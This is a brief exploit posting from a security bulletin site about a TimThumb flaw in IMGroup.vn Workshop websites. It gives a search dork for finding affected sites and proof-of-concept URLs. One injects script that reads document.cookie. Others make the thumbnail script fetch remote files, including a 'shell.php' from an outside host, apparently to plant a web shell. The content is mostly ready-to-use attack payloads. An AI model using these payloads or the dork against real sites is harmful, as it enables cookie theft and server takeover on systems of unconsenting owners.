IMGroup.vn Workshop CSS Vulnerability

Published
Credit
Risk
2017.08.04
MaLeets
Low
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: "generator" content="imgroup.vn"

# Exploit Title: IMGroup.vn Workshop CSS Vulnerability
# Author: MaLeets
# Date: 4 August 2017
# Tested on: Windows 7

https://localhost/timthumb.php
Vulnerability? TimThumb OK.

Proof of concept (PoC)
https://localhost/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
https://localhost/timthumb.php?src=http://
https://localhost/timthumb.php?src=http://www.example.com/big_file&h=1&w=1
https://localhost/timthumb.php?src=http://www.example.com/shell.php
etc TimThumb exploit bro.

Kam007 (MaLeets Security)
Indonesian Freedom Security :*


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com